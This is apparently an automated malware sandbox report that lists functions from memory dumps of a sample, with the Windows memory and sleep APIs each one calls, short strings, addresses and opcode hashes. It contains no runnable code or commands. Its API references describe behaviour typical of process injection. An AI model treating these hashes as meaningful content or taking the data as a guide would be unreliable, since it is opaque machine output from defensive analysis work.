Opcode Fuzzy Hash: b68ae32e1ee5c9797d0474bb537eddd7fdd437c130ac057b18c9b8e00297d5ea
Instruction Fuzzy Hash: 972148B19002099FDB10DFAAC544BEEBBF4EF48320F24842AD459A7250DB74A944CFA0

Function 071594C0 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 07159534

Memory Dump Source

Source File: 00000000.00000002.2055062061.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7150000_Ref#2056119.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 900c35c4fb7b9cecb5b9f8e118056207740594370a80c01869d998d4da1c2e69
Instruction ID: 4042b87eddf0ecd744ff62a08d7496fb7747572709454a93dd4e377191e62908
Opcode Fuzzy Hash: 900c35c4fb7b9cecb5b9f8e118056207740594370a80c01869d998d4da1c2e69
Instruction Fuzzy Hash: C72127B1900209DFDB14DFAAC545BEEFBF4EF48320F14842AD459A7250C778A544CFA5

Function 07158428 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 0715849F

Memory Dump Source

Source File: 00000000.00000002.2055062061.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7150000_Ref#2056119.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: af6981a427d9d82b367b08ad755499111bbb7b21d09070a494504b7792c1fbaa
Instruction ID: 6633e3aa9743488ee8b31d17ed3521c9b47faae236245116647e0933488cc5e5
Opcode Fuzzy Hash: af6981a427d9d82b367b08ad755499111bbb7b21d09070a494504b7792c1fbaa
Instruction Fuzzy Hash: 7E116DB19003598FDB14DFAAC4457EEFFF9AF48320F14841AD855A7250CB759944CBA4

Function 070AF548 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 070AF5BC

Memory Dump Source

Source File: 00000000.00000002.2054422216.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70a0000_Ref#2056119.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: d8fee2c838d0b0df95c18220f878ebf500be075561fd96d15ea1b155f201155c
Instruction ID: 4b51638c2e6ede5c08e397c57421f135598ad79c66bdde967ac0a1d930e66c4a
Opcode Fuzzy Hash: d8fee2c838d0b0df95c18220f878ebf500be075561fd96d15ea1b155f201155c
Instruction Fuzzy Hash: 5B1106B1D002499FDB10DFAAC844BDEFBF4EF48320F14842AD559A7250C775A944CFA4

Function 07158430 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 0715849F

Memory Dump Source

Source File: 00000000.00000002.2055062061.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7150000_Ref#2056119.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: c49aa29614591d97aa592fd0e0518072cd832b7792f064f0120ab74f7c4eb783
Instruction ID: defe9566b1ad8b29762cc252d37aa164f5ba349cf72921e96d7ba52945954f10
Opcode Fuzzy Hash: c49aa29614591d97aa592fd0e0518072cd832b7792f064f0120ab74f7c4eb783
Instruction Fuzzy Hash: 66113AB19002598FDB14DFAAC444BEEFBF9AB88320F14841AD855A7250C7749944CBA4

Function 0717FE10 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0717FE7E

Memory Dump Source

Source File: 00000000.00000002.2055147805.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_Ref#2056119.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 81891351a47992935a3da710734b704184ceb4c60c34f4295f0f3634b9bce106
Instruction ID: 745105f0ee7dd07b70429bb398783d136060e277c6edcfac05c7a788723cc946
Opcode Fuzzy Hash: 81891351a47992935a3da710734b704184ceb4c60c34f4295f0f3634b9bce106
Instruction Fuzzy Hash: 671137B19002499FCB10DFAAC944BDFBFF9EF88320F148819E559A7250CB75A944CFA4

Function 01338E29 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(0000004B), ref: 01338E9D

Memory Dump Source

Source File: 00000000.00000002.2030531870.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_Ref#2056119.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 76e64b878b29c1b672dd7c451468e29794a41dee758ae716ab7ceaba7b5fffd7
Instruction ID: 91376c6ec07a6f0ea238e008900118b7318ee64315c3c512373dcbbb0c2db007
Opcode Fuzzy Hash: 76e64b878b29c1b672dd7c451468e29794a41dee758ae716ab7ceaba7b5fffd7
Instruction Fuzzy Hash: AC21CDB4804398CFDB21CF59C4047EEBFF0EB49314F044599D498A7242C3799688CBA5

Function 01338E38 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(0000004B), ref: 01338E9D

Memory Dump Source

Source File: 00000000.00000002.2030531870.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_Ref#2056119.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 55efa787ef5a579b8ce9da298650a2099b394b4d5d969b5f138425bd888067a9
Instruction ID: 8c01cb4362ba688074cfd9facf9ff2bdd34f8c988c7c956f1108ae8786c30f9a
Opcode Fuzzy Hash: 55efa787ef5a579b8ce9da298650a2099b394b4d5d969b5f138425bd888067a9
Instruction Fuzzy Hash: 7B118BB5804399CEDB20CF59C5047EEBFF4EB49318F148599D588B7242C379A688CBA9

Function 0133A518 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0133A57E

Memory Dump Source

Source File: 00000000.00000002.2030531870.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_Ref#2056119.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 6a1164b68597136ae4a7b176401776a26e83281e9892c9fc910dc2defdb69ce6
Instruction ID: 8a2f15403c28155ebc69bb386675b949daaf4d6e2f262dfed84dfb124d681759
Opcode Fuzzy Hash: 6a1164b68597136ae4a7b176401776a26e83281e9892c9fc910dc2defdb69ce6
Instruction Fuzzy Hash: BE110FB6C00349CFDB10CF9AC444ADEFBF4AB88224F10842AD898A7250D379A545CFA5

Function 07438A48 Relevance: 1.5, Strings: 1, Instructions: 290COMMON

Download Yara Rule

Strings

,oq, xrefs: 07438DD3

Memory Dump Source

Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd

Similarity

API ID:
String ID: ,oq
API String ID: 0-651702701
Opcode ID: f606dbe2c30953b5fc358a87f92acca9cbf52dd6e63d2113a9d028ce326606ea
Instruction ID: 673202eb70a26164e496d66aec29f3ec548d8f2bea39747a65ad5d98033a0ca4
Opcode Fuzzy Hash: f606dbe2c30953b5fc358a87f92acca9cbf52dd6e63d2113a9d028ce326606ea
Instruction Fuzzy Hash: 6EC172B4A002299FDB14CB69C951BDDBBF6BF88700F158199E509AB3A4CA31DD81CF61

Function 074335B0 Relevance: 1.5, Strings: 1, Instructions: 244COMMON

Download Yara Rule

Strings

Plkq, xrefs: 07433798

Memory Dump Source

Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd

Similarity

API ID:
String ID: Plkq
API String ID: 0-177148220
Opcode ID: 2b757b5fbeff07cb3735e5ed0320a2ade73df1e8c7c7e31c3937d02135284631
Instruction ID: a4540d3f2695af0491637d4b38ba49ff0a182d0837da0075958cf99161bbce75
Opcode Fuzzy Hash: 2b757b5fbeff07cb3735e5ed0320a2ade73df1e8c7c7e31c3937d02135284631
Instruction Fuzzy Hash: 41911570B001158FCB14DF29C584AAABBF6BF89710B1580AAE505DF3B5DB71EC42CBA1

Function 07437B68 Relevance: 1.5, Strings: 1, Instructions: 226COMMON

Download Yara Rule

Strings

4'kq, xrefs: 07437D92

Memory Dump Source

Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd

Similarity

API ID:
String ID: 4'kq
API String ID: 0-3255046985
Opcode ID: 2e7632f99ab385a56ebe94c95fc6e08cdeef9ef83796f061c6dfe0cb8428d611
Instruction ID: b11206376966e59caa2c224daa95ca1002088d22d61bf9dfddd6f4aee66cf1d9
Opcode Fuzzy Hash: 2e7632f99ab385a56ebe94c95fc6e08cdeef9ef83796f061c6dfe0cb8428d611
Instruction Fuzzy Hash: 40A10CB4A10218DFCB05EFA8D9949DDB7B2FF89310F558159E845AB3A4DB34AC42CF81

Function 0743B380 Relevance: 1.5, Strings: 1, Instructions: 201COMMON

Download Yara Rule

Strings

4'kq, xrefs: 0743B492

Memory Dump Source

Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd

Similarity

API ID:
String ID: 4'kq
API String ID: 0-3255046985
Opcode ID: 4c8d78c54050948249b63b263dcdc9892a37d49b354c46a97d6a01e94069376c
Instruction ID: 803e2996f11d3831e9418ec0ee02ccb99867ab8f05e59869a77eb8da2c95e5ae
Opcode Fuzzy Hash: 4c8d78c54050948249b63b263dcdc9892a37d49b354c46a97d6a01e94069376c
Instruction Fuzzy Hash: B4713BB0B40214DFDB15DB65C994BAE77B6EF8C700F10846AE505AB3A4CB75EC42CB91

Function 0714D8B8 Relevance: 1.4, Strings: 1, Instructions: 156COMMON

Download Yara Rule

Strings

poq, xrefs: 0714D968

Memory Dump Source

Source File: 00000000.00000002.2054942667.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7140000_Ref#2056119.jbxd

Similarity

API ID:
String ID: poq
API String ID: 0-1570044193
Opcode ID: 986787c0bd809f831b534f141b4c1a59054b6f06473da9c73f22d6f27d7c0847
Instruction ID: f88d6080a925b3e4cbfcdabf8d9c547b9b7685e99fba7dbe5876b3c778d13617
Opcode Fuzzy Hash: 986787c0bd809f831b534f141b4c1a59054b6f06473da9c73f22d6f27d7c0847
Instruction Fuzzy Hash: 5A517C76600114AFCB459FA9D944D6A7BB7FF9C31071680A8E2098B372DB32DC62EB50

Function 0743C878 Relevance: 1.4, Strings: 1, Instructions: 143COMMON

Download Yara Rule

Strings

(oq, xrefs: 0743C9A4

Memory Dump Source

Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd

Similarity

API ID:
String ID: (oq
API String ID: 0-3175707579
Opcode ID: c2275145a6ac8120002a522e2a3ad1478352e08216dbd24405f8bc1207f32e22
Instruction ID: 953ce900213e9dde1341995652bab767c90aa2da8b8466660dd4f6aa376e1cfe
Opcode Fuzzy Hash: c2275145a6ac8120002a522e2a3ad1478352e08216dbd24405f8bc1207f32e22
Instruction Fuzzy Hash: 1E518E76704244AFCB069F69D854D597FB6EF8932071A80E6E209CF3B2CB36D811DB51

Function 0743B819 Relevance: 1.4, Strings: 1, Instructions: 140COMMON

Download Yara Rule

Strings

4'kq, xrefs: 0743B862

Memory Dump Source

Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd

Similarity

API ID:
String ID: 4'kq
API String ID: 0-3255046985
Opcode ID: c7ea99d8518f263fb625bb93ddcd523ce46bf256663409446ebd3a5d84960aa7
Instruction ID: 35f27655f21377e81c98655f2170a99ca2a43b82389e3cf9ea2e88a1ce82a615
Opcode Fuzzy Hash: c7ea99d8518f263fb625bb93ddcd523ce46bf256663409446ebd3a5d84960aa7
Instruction Fuzzy Hash: 6B41C7B0B106149FCB05AB65D4A4AEEB7B7EFCD600F10452EE446AB394CF749C06CB92

Function 0743B220 Relevance: 1.4, Strings: 1, Instructions: 117COMMON

Download Yara Rule

Strings

4'kq, xrefs: 0743B2D7

Memory Dump Source

Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd

Similarity

API ID:
String ID: 4'kq
API String ID: 0-3255046985
Opcode ID: df661ff27b16ef21fadeeb33c6c42cc7d2f70bac9f3346602ff8a205c2ac1a84
Instruction ID: b6ea69c3bb0a88720ca1dade41c619cdb6aa7df002f979d571cd9b89aff40be8
Opcode Fuzzy Hash: df661ff27b16ef21fadeeb33c6c42cc7d2f70bac9f3346602ff8a205c2ac1a84
Instruction Fuzzy Hash: C8418EB53402109FD318DB29C9A4B6B7BA6AFCC710F104569E10ACF3A5DE75EC42C791

Function 0743B230 Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

4'kq, xrefs: 0743B2D7

Memory Dump Source

Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd

Similarity

API ID:
String ID: 4'kq
API String ID: 0-3255046985
Opcode ID: 5cccb76b93a3062348bbb8566c7d11079b1c4615c1f8af5f2432cff960c9e5be
Instruction ID: 443ca162bcb3fd3d1f30c6442f302d970a0a7d68bc90186d2df280ec1d4f77b3
Opcode Fuzzy Hash: 5cccb76b93a3062348bbb8566c7d11079b1c4615c1f8af5f2432cff960c9e5be
Instruction Fuzzy Hash: 053159B53406149FD308DB69C9A8B6B77AAEFCC700F104568E60A8F3A5CE75EC42C791

Function 07436FD8 Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

4'kq, xrefs: 07437031

Memory Dump Source

Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd

Similarity

API ID:
String ID: 4'kq
API String ID: 0-3255046985
Opcode ID: ed04fbb28f62dc5482215696183201ef50df0259bdccf85f36b2d1536a630d7a
Instruction ID: 8fe48cde623c40d4ada3b05e91ef270caf5180ce2acc52ce3cd56a88ebcd380d
Opcode Fuzzy Hash: ed04fbb28f62dc5482215696183201ef50df0259bdccf85f36b2d1536a630d7a
Instruction Fuzzy Hash: 8031C871A002459FCF059F64C9A4999BF76FF8D310B1540AAE6456F3A1DB31EC53CB90

Function 0743218F Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

p<kq, xrefs: 074321DA

Memory Dump Source

Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd

Similarity

API ID:
String ID: p<kq
API String ID: 0-3321991346
Opcode ID: 71f19e5984d0373cc65508ba02b5e48374dae98b16af6b816c0563971b40987c
Instruction ID: 33fcac0d8884cb35a843f8bb2fd2915f26fcb099713ab6caa4bbf39b76bfeebc
Opcode Fuzzy Hash: 71f19e5984d0373cc65508ba02b5e48374dae98b16af6b816c0563971b40987c
Instruction Fuzzy Hash: 872160B53042959FCB158F29CC50AEA7BE5BF8E210B194096FD45CB3B1C675DC51CB60

Function 070F1E97 Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

4'kq, xrefs: 070F2659

Memory Dump Source

Source File: 00000000.00000002.2054592830.00000000070F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70f0000_Ref#2056119.jbxd

Similarity

API ID:
String ID: 4'kq
API String ID: 0-3255046985
Opcode ID: ba9da258c965a5ba893bbb9221a40682b6d6f29559f612e2d40e8eeae4346f5b
Instruction ID: 2dbf95a64dd2d98ebb997c43792663124a4712e4b7e66350f030644e2a71ee59
Opcode Fuzzy Hash: ba9da258c965a5ba893bbb9221a40682b6d6f29559f612e2d40e8eeae4346f5b
Instruction Fuzzy Hash: B5216BB4E0424ACFDB15CFA9D5146FEBBB1FF49301F1082AAD611A7691CB381A85CF91

Function 0714A5F4 Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

Tekq, xrefs: 0714ACE2

Memory Dump Source

Source File: 00000000.00000002.2054942667.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7140000_Ref#2056119.jbxd

Similarity

API ID:
String ID: Tekq
API String ID: 0-2319236580
Opcode ID: b372fefab44d68731467abcebf1ec2fe24b1f450a10af77d3eb31fbd9b7a3ad6
Instruction ID: 455284128cf4fc7d75428c0a5d8934b498097cf5707a0d93bd3e9d88b04f3ade
Opcode Fuzzy Hash: b372fefab44d68731467abcebf1ec2fe24b1f450a10af77d3eb31fbd9b7a3ad6
Instruction Fuzzy Hash: 7521F3B4A41129CFDB68DF69C890BA9B7F2FB8A700F1181A9D40DA7384DB346D85CF50

Function 0133FE89 Relevance: 1.3, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 0133FEFB

Memory Dump Source

Source File: 00000000.00000002.2030531870.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_Ref#2056119.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 83be5932f6fe4034a15cea783a94ec98a64aa4a3bd6016fc6a844b0c7e3137f9
Instruction ID: 04dd1e0aceabd149df242da56472181af97221ae6aa257aaacc1cebbb678923e
Opcode Fuzzy Hash: 83be5932f6fe4034a15cea783a94ec98a64aa4a3bd6016fc6a844b0c7e3137f9
Instruction Fuzzy Hash: 211159758002489BCB10DFAAC844BDEBFF9EB88320F148419D455A7210C7759544CFA5

Function 0133FE90 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 0133FEFB

Memory Dump Source

Source File: 00000000.00000002.2030531870.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_Ref#2056119.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 76d5c0b4bf7df0b353e20ab6ba84af955027edd13485a503fa27b38c50cca5b1
Instruction ID: 91b2df1fe83708f3e52a8a991799e39fdc7c21eb22d1dec68c8253f605d0bd1d
Opcode Fuzzy Hash: 76d5c0b4bf7df0b353e20ab6ba84af955027edd13485a503fa27b38c50cca5b1
Instruction Fuzzy Hash: 6D1134B19002489FDB20DFAAC844BDEBFF9EF88324F248819E559A7250C775A544CFA4

Function 0714A674 Relevance: 1.3, Strings: 1, Instructions: 48COMMON

Download Yara Rule

Strings

Tekq, xrefs: 0714ACE2

Memory Dump Source

Source File: 00000000.00000002.2054942667.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7140000_Ref#2056119.jbxd

Similarity

API ID:
String ID: Tekq
API String ID: 0-2319236580
Opcode ID: f49abedac343fb7af129be8b8ceb2964f176c12e384c3ac4d7a7b2dded203bbb
Instruction ID: e12f9b2c7b64c0bfb14b81bce74d66da78b28ab5ae0aa9e509dafc3ffd92d7da
Opcode Fuzzy Hash: f49abedac343fb7af129be8b8ceb2964f176c12e384c3ac4d7a7b2dded203bbb
Instruction Fuzzy Hash: F411F6B0E51119CFDB68DF69C890B9DBBB2BF89300F1191A9D40DA7394DB346D858F40

Function 07147C8A Relevance: 1.3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

Strings

Y, xrefs: 07147D2F

Memory Dump Source

Source File: 00000000.00000002.2054942667.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7140000_Ref#2056119.jbxd

Similarity

API ID:
String ID: Y
API String ID: 0-3233089245
Opcode ID: a3bc5f07b388eebe26cedf768ac39d714d6debaa2f8093f2cc0a5a0dad8ceb1e
Instruction ID: c3c825e9e2ea7503dbcd7cede48c690e7614b8c41477052f7f7f5bdf687db613
Opcode Fuzzy Hash: a3bc5f07b388eebe26cedf768ac39d714d6debaa2f8093f2cc0a5a0dad8ceb1e
Instruction Fuzzy Hash: AD11BA74A4012A8FCB64DF24C958BA9BBF1FF49341F1192F9D419A7351DB309E858F41

Function 07148CC4 Relevance: 1.3, Strings: 1, Instructions: 27COMMON

Download Yara Rule

Strings

e, xrefs: 07146524

Memory Dump Source

Source File: 00000000.00000002.2054942667.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7140000_Ref#2056119.jbxd

Similarity

API ID:
String ID: e
API String ID: 0-4024072794
Opcode ID: 165efb10c717447997f4f83e594b0b89e351d22acd3140a634868783d613c1d1
Instruction ID: 348adcd973b1736d9665d637ac1b080f85755bacd2c3a9da89b7eed929a81c5f
Opcode Fuzzy Hash: 165efb10c717447997f4f83e594b0b89e351d22acd3140a634868783d613c1d1
Instruction Fuzzy Hash: 490114B4A1032DDFCBA18F14D8887D9B7B0FB0A315F0091D6C019A2280DB381BCACF82

Function 071464D1 Relevance: 1.3, Strings: 1, Instructions: 20COMMON

Download Yara Rule

Strings

e, xrefs: 07146524

Memory Dump Source

Source File: 00000000.00000002.2054942667.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7140000_Ref#2056119.jbxd

Similarity

API ID:
String ID: e
API String ID: 0-4024072794
Opcode ID: 521d576aba800e7565133624cfab4a370bc27783a27a1b0da4f134de918d914b
Instruction ID: 73979f744846c947d12305bdb9bc2e98895012bcdef03d82b098a4903b3b31ae
Opcode Fuzzy Hash: 521d576aba800e7565133624cfab4a370bc27783a27a1b0da4f134de918d914b
Instruction Fuzzy Hash: 6FF074B4A1026CCFCB61DF14D9997D9B7F4AB09715F1095DAD009A2280DB385FC9CF52

Function 07148142 Relevance: 1.3, Strings: 1, Instructions: 18COMMON

Download Yara Rule

Strings

0, xrefs: 0714819A

Memory Dump Source

Source File: 00000000.00000002.2054942667.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7140000_Ref#2056119.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: f51e794c7b681c6c74dca66448b7520bf543a2ddaa1577648f5f5bfafc5fce05
Instruction ID: db3495003f72d43b6ec8f637ca2b782c3030eba4627e5a9661e696cf692e56e1
Opcode Fuzzy Hash: f51e794c7b681c6c74dca66448b7520bf543a2ddaa1577648f5f5bfafc5fce05
Instruction Fuzzy Hash: B6F0F874911A698FCBA4DF24DD9879ABBB1EB49206F1191EA980DB3250DA341EC59F00

Function 0743BA68 Relevance: .4, Instructions: 437COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13013977b286d36ab420dc2d2a4d5bc7ad839d4c2c1dd2237b02df3d589a7d4c
Instruction ID: 821154e274fad098d6a0a959d032eaa5ec796a8c6e190dec6f909894f78c67f3
Opcode Fuzzy Hash: 13013977b286d36ab420dc2d2a4d5bc7ad839d4c2c1dd2237b02df3d589a7d4c
Instruction Fuzzy Hash: EE1229B4A00219CFCB14EF68C994B9DB7B2BF89300F5085A9D449AB395DF34ED85CB51

Function 0743FA5F Relevance: .3, Instructions: 318COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 496d62a1d16ab288fa3958284761faec4e2520c74c50ab32b5cd33004f3f46ae
Instruction ID: ea7d8e63d27ace3be450d11d7712842e3e369f0ac7c265827640a27227f0f323
Opcode Fuzzy Hash: 496d62a1d16ab288fa3958284761faec4e2520c74c50ab32b5cd33004f3f46ae
Instruction Fuzzy Hash: 4FC1E8B1A047518FCB258F29C4546AABBF2FF89310F29855ED49ECB792CB34E845CB41

Function 0743BA58 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 958f280da67cbf75cad3defea45f2510fb5b115cb538c5661c508d1e476b42a8
Instruction ID: ae7fd06156597aceb0a31ad25c79fcb305c1fe58c661d23243adc4a807acd22e
Opcode Fuzzy Hash: 958f280da67cbf75cad3defea45f2510fb5b115cb538c5661c508d1e476b42a8
Instruction Fuzzy Hash: B2A10AB4A00219CFDB14DF68C994B99B7B2FF89300F5085A9E44AAB395DF34AD85CF50

Function 0743CA10 Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25aa6abd6ffde82202a08cadd8e83a1f1ac4962bfad8d7e2ada814a37b8990a8
Instruction ID: 0e7641d5c0823b1043dbf0e3d4326180031f425faafcb192695ce508c1254a67
Opcode Fuzzy Hash: 25aa6abd6ffde82202a08cadd8e83a1f1ac4962bfad8d7e2ada814a37b8990a8
Instruction Fuzzy Hash: 6A915BB0710214DFCB04DF68D494AAEB7B5BF89710F1481AAE54AEB3A5CB34EC41CB91

Function 07434710 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa50843db432339155e493aef8ab6e80b43948dca6e51003c2ea1abda8756727
Instruction ID: 3ffe1287a56e7d3d10c95c7c6ca97e7c4f283de724ed7b1c5068cac8acf4b658
Opcode Fuzzy Hash: aa50843db432339155e493aef8ab6e80b43948dca6e51003c2ea1abda8756727
Instruction Fuzzy Hash: 86812875A00259CFCB14DF69C5849AEBBF5FF89310B15816AE81A9B374DB30ED42CB90

Function 0714ECA5 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2054942667.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7140000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94ace70f2c218b0b0575ef8f61df5724ece11ce3c7bf1b45fa14d2ae76aa744e
Instruction ID: da336ad19dd663ab5ad0b0edf805392388da1821ca906c95a43f506150f9f724
Opcode Fuzzy Hash: 94ace70f2c218b0b0575ef8f61df5724ece11ce3c7bf1b45fa14d2ae76aa744e
